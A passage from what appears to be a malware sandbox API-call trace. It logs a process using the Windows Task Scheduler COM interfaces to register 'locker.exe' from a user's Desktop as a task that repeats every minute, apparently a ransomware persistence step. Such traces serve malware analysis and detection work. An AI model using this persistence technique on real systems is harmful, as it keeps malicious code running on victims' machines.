(_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] lstrlenW (lpString="f") returned 1 [0113.500] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|i|") returned 3 [0113.500] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.500] lstrlenW (lpString="|i|") returned 3 [0113.500] lstrlenW (lpString="|f|") returned 3 [0113.500] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0 [0113.500] RtlRestoreLastWin32Error () returned 0x3163000 [0113.500] lstrlenW (lpString="tn") returned 2 [0113.500] lstrlenW (lpString="tn") returned 2 [0113.500] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] lstrlenW (lpString="f") returned 1 [0113.500] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|tn|") returned 4 [0113.500] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.500] lstrlenW (lpString="|tn|") returned 4 [0113.500] lstrlenW (lpString="|f|") returned 3 [0113.500] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0 [0113.500] RtlRestoreLastWin32Error () returned 0x3163000 [0113.500] lstrlenW (lpString="tr") returned 2 [0113.500] lstrlenW (lpString="tr") returned 2 [0113.500] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] lstrlenW (lpString="f") returned 1 [0113.500] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.500] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|tr|") returned 4 [0113.500] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.500] lstrlenW (lpString="|tr|") returned 4 [0113.500] lstrlenW (lpString="|f|") returned 3 [0113.501] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0 [0113.501] RtlRestoreLastWin32Error () returned 0x3163000 [0113.501] lstrlenW (lpString="st") returned 2 [0113.501] lstrlenW (lpString="st") returned 2 [0113.501] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.501] lstrlenW (lpString="f") returned 1 [0113.501] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.501] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|st|") returned 4 [0113.501] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.501] lstrlenW (lpString="|st|") returned 4 [0113.501] lstrlenW (lpString="|f|") returned 3 [0113.501] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0 [0113.501] RtlRestoreLastWin32Error () returned 0x3163000 [0113.501] lstrlenW (lpString="sd") returned 2 [0113.501] lstrlenW (lpString="sd") returned 2 [0113.501] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.501] lstrlenW (lpString="f") returned 1 [0113.501] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.501] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|sd|") returned 4 [0113.501] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.501] lstrlenW (lpString="|sd|") returned 4 [0113.501] lstrlenW (lpString="|f|") returned 3 [0113.501] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0 [0113.501] RtlRestoreLastWin32Error () returned 0x3163000 [0113.501] lstrlenW (lpString="ed") returned 2 [0113.501] lstrlenW (lpString="ed") returned 2 [0113.501] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.502] lstrlenW (lpString="f") returned 1 [0113.502] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.502] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ed|") returned 4 [0113.502] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.502] lstrlenW (lpString="|ed|") returned 4 [0113.502] lstrlenW (lpString="|f|") returned 3 [0113.502] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0 [0113.502] RtlRestoreLastWin32Error () returned 0x3163000 [0113.502] lstrlenW (lpString="it") returned 2 [0113.502] lstrlenW (lpString="it") returned 2 [0113.502] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.502] lstrlenW (lpString="f") returned 1 [0113.502] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|it|") returned 4 [0113.503] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.503] lstrlenW (lpString="|it|") returned 4 [0113.503] lstrlenW (lpString="|f|") returned 3 [0113.503] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0 [0113.503] RtlRestoreLastWin32Error () returned 0x3163000 [0113.503] lstrlenW (lpString="et") returned 2 [0113.503] lstrlenW (lpString="et") returned 2 [0113.503] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] lstrlenW (lpString="f") returned 1 [0113.503] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|et|") returned 4 [0113.503] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.503] lstrlenW (lpString="|et|") returned 4 [0113.503] lstrlenW (lpString="|f|") returned 3 [0113.503] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0 [0113.503] RtlRestoreLastWin32Error () returned 0x3163000 [0113.503] lstrlenW (lpString="k") returned 1 [0113.503] lstrlenW (lpString="k") returned 1 [0113.503] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] lstrlenW (lpString="f") returned 1 [0113.503] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|k|") returned 3 [0113.503] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.503] lstrlenW (lpString="|k|") returned 3 [0113.503] lstrlenW (lpString="|f|") returned 3 [0113.503] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0 [0113.503] RtlRestoreLastWin32Error () returned 0x3163000 [0113.503] lstrlenW (lpString="du") returned 2 [0113.503] lstrlenW (lpString="du") returned 2 [0113.503] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] lstrlenW (lpString="f") returned 1 [0113.503] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.503] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|du|") returned 4 [0113.504] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.504] lstrlenW (lpString="|du|") returned 4 [0113.504] lstrlenW (lpString="|f|") returned 3 [0113.504] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0 [0113.504] RtlRestoreLastWin32Error () returned 0x3163000 [0113.504] lstrlenW (lpString="ri") returned 2 [0113.504] lstrlenW (lpString="ri") returned 2 [0113.504] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] lstrlenW (lpString="f") returned 1 [0113.504] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ri|") returned 4 [0113.504] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.504] lstrlenW (lpString="|ri|") returned 4 [0113.504] lstrlenW (lpString="|f|") returned 3 [0113.504] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0 [0113.504] RtlRestoreLastWin32Error () returned 0x3163000 [0113.504] lstrlenW (lpString="z") returned 1 [0113.504] lstrlenW (lpString="z") returned 1 [0113.504] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] lstrlenW (lpString="f") returned 1 [0113.504] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|z|") returned 3 [0113.504] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.504] lstrlenW (lpString="|z|") returned 3 [0113.504] lstrlenW (lpString="|f|") returned 3 [0113.504] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0 [0113.504] RtlRestoreLastWin32Error () returned 0x3163000 [0113.504] lstrlenW (lpString="f") returned 1 [0113.504] lstrlenW (lpString="f") returned 1 [0113.504] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] lstrlenW (lpString="f") returned 1 [0113.504] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.504] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.504] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.505] lstrlenW (lpString="|f|") returned 3 [0113.505] lstrlenW (lpString="|f|") returned 3 [0113.505] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|" [0113.505] RtlRestoreLastWin32Error () returned 0x3163000 [0113.505] RtlRestoreLastWin32Error () returned 0x3163000 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d010 [0113.505] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.505] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0113.505] lstrlenW (lpString="MINUTE") returned 6 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fc90 [0113.505] GetThreadLocale () returned 0x409 [0113.505] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="MINUTE", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 2 [0113.505] RtlRestoreLastWin32Error () returned 0x3163000 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x1fc) returned 0x330f138 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x33102d8 [0113.505] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.505] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0113.505] lstrlenW (lpString="First") returned 5 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xc) returned 0x330fc18 [0113.505] GetProcessHeap () returned 0x3300000 [0113.505] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x33100d8 [0113.505] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.506] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0113.506] lstrlenW (lpString="Second") returned 6 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fcf0 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x33100b8 [0113.506] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.506] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0113.506] lstrlenW (lpString="Third") returned 5 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xc) returned 0x330fba0 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3310218 [0113.506] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.506] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0113.506] lstrlenW (lpString="Fourth") returned 6 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fc48 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3310298 [0113.506] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.506] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0113.506] lstrlenW (lpString="Last") returned 4 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xa) returned 0x330fa50 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x1fc) returned 0x330f340 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330f340) returned 1 [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330f340) returned 0x1fc [0113.506] GetProcessHeap () returned 0x3300000 [0113.506] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x33101b8 [0113.506] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0113.507] lstrlenW (lpString="First") returned 5 [0113.507] GetProcessHeap () returned 0x3300000 [0113.507] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xc) returned 0x330fc00 [0113.507] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0113.507] lstrlenW (lpString="Second") returned 6 [0113.507] GetProcessHeap () returned 0x3300000 [0113.507] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fb28 [0113.507] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0113.507] lstrlenW (lpString="Third") returned 5 [0113.507] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0113.507] lstrlenW (lpString="Fourth") returned 6 [0113.507] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0113.507] lstrlenW (lpString="Last") returned 4 [0113.507] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xd2c958, cchData=128 | out: lpLCData="0") returned 2 [0113.507] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.507] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0113.507] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0113.507] GetProcessHeap () returned 0x3300000 [0113.507] GetProcessHeap () returned 0x3300000 [0113.508] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fc18) returned 1 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fc18) returned 0xc [0113.508] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fc18) returned 1 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x16) returned 0x3310118 [0113.508] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0xd2c95c, cchData=128 | out: lpLCData="0") returned 2 [0113.508] _memicmp (_Buf1=0x330fbd0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.508] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x330fde0, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0113.508] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fcf0) returned 1 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330fcf0) returned 0xe [0113.508] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330fcf0) returned 1 [0113.508] GetProcessHeap () returned 0x3300000 [0113.508] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x16) returned 0x33102b8 [0113.508] GetLocalTime (in: lpSystemTime=0xd2cb3c | out: lpSystemTime=0xd2cb3c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x35, wSecond=0x0, wMilliseconds=0xe3)) [0113.508] lstrlenW (lpString="") returned 0 [0113.508] GetLocalTime (in: lpSystemTime=0xd2cff0 | out: lpSystemTime=0xd2cff0*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x35, wSecond=0x0, wMilliseconds=0xe3)) [0113.508] lstrlenW (lpString="") returned 0 [0113.508] lstrlenW (lpString="") returned 0 [0113.508] lstrlenW (lpString="") returned 0 [0113.508] lstrlenW (lpString="") returned 0 [0113.508] lstrlenW (lpString="1") returned 1 [0113.509] _wtol (_String="1") returned 1 [0113.509] lstrlenW (lpString="") returned 0 [0113.509] lstrlenW (lpString="") returned 0 [0113.509] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0113.516] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0132.409] CoCreateInstance (in: rclsid=0xf32870*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xf32880*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xd2cf5c | out: ppv=0xd2cf5c*=0x32f2430) returned 0x0 [0134.820] TaskScheduler:ITaskService:Connect (This=0x32f2430, serverName=0xd2cec0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xd2ced0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xd2cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xd2cef0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0143.777] TaskScheduler:ITaskService:GetFolder (in: This=0x32f2430, Path=0x0, ppFolder=0xd2cfd8 | out: ppFolder=0xd2cfd8*=0x32f2508) returned 0x0 [0153.589] TaskScheduler:ITaskService:NewTask (in: This=0x32f2430, flags=0x0, ppDefinition=0xd2cfe4 | out: ppDefinition=0xd2cfe4*=0x32f2558) returned 0x0 [0153.589] ITaskDefinition:get_Actions (in: This=0x32f2558, ppActions=0xd2cf58 | out: ppActions=0xd2cf58*=0x32f25a8) returned 0x0 [0153.590] IActionCollection:Create (in: This=0x32f25a8, Type=0, ppAction=0xd2cf5c | out: ppAction=0xd2cf5c*=0x32f27c8) returned 0x0 [0153.590] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0153.590] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0153.590] lstrlenW (lpString=" ") returned 1 [0153.590] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x46) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x56) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x79) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0153.590] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x6b) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x6c) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x6b) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0153.591] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0153.591] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0153.591] StrChrIW (lpStart="C:\\Users\\FD1HVy\\Desktop\\locker.exe", wMatch=0x20) returned 0x0 [0153.591] RtlRestoreLastWin32Error () returned 0x3163000 [0153.593] IUnknown:Release (This=0x32f27c8) returned 0x1 [0153.593] IUnknown:Release (This=0x32f25a8) returned 0x1 [0153.593] ITaskDefinition:get_Triggers (in: This=0x32f2558, ppTriggers=0xd2cb28 | out: ppTriggers=0xd2cb28*=0x32f2710) returned 0x0 [0153.593] ITriggerCollection:Create (in: This=0x32f2710, Type=1, ppTrigger=0xd2cb3c | out: ppTrigger=0xd2cb3c*=0x32f2810) returned 0x0 [0153.593] lstrlenW (lpString="1") returned 1 [0153.593] _vsnwprintf (in: _Buffer=0xd2cadc, _BufferCount=0xf, _Format="PT%sM", _ArgList=0xd2cad0 | out: _Buffer="PT1M") returned 4 [0153.594] ITrigger:get_Repetition (in: This=0x32f2810, ppRepeat=0xd2cb38 | out: ppRepeat=0xd2cb38*=0x32f2860) returned 0x0 [0153.594] IRepetitionPattern:put_Interval (This=0x32f2860, Interval="PT1M") returned 0x0 [0153.594] IUnknown:Release (This=0x32f2860) returned 0x1 [0153.594] _vsnwprintf (in: _Buffer=0xd2caac, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xd2ca8c | out: _Buffer="2020-10-28T13:53:00") returned 19 [0153.594] ITrigger:put_StartBoundary (This=0x32f2810, StartBoundary="2020-10-28T13:53:00") returned 0x0 [0153.594] lstrlenW (lpString="") returned 0 [0153.594] lstrlenW (lpString="") returned 0 [0153.594] lstrlenW (lpString="") returned 0 [0153.594] lstrlenW (lpString="") returned 0 [0153.594] IUnknown:Release (This=0x32f2810) returned 0x1 [0153.594] IUnknown:Release (This=0x32f2710) returned 0x1 [0153.594] ITaskDefinition:get_Settings (in: This=0x32f2558, ppSettings=0xd2cf64 | out: ppSettings=0xd2cf64*=0x32f2660) returned 0x0 [0153.595] lstrlenW (lpString="") returned 0 [0153.595] IUnknown:Release (This=0x32f2660) returned 0x5 [0153.595] GetLocalTime (in: lpSystemTime=0xd2ce58 | out: lpSystemTime=0xd2ce58*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x35, wSecond=0x28, wMilliseconds=0x13d)) [0153.595] ResolveDelayLoadedAPI () returned 0x7444db00 [0153.596] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xd2ce68, nSize=0xd2ce50 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0xd2ce50) returned 0x1 [0153.598] ITaskDefinition:get_RegistrationInfo (in: This=0x32f2558, ppRegistrationInfo=0xd2ce54 | out: ppRegistrationInfo=0xd2ce54*=0x32f25f0) returned 0x0 [0153.599] IRegistrationInfo:put_Author (This=0x32f25f0, Author="NQDPDE\\FD1HVy") returned 0x0 [0153.599] _vsnwprintf (in: _Buffer=0xd2ce68, _BufferCount=0x7f, 